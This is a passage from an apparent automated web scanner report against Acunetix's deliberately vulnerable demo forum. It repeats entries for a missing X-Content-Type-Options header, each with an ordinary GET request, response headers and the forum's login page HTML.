InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
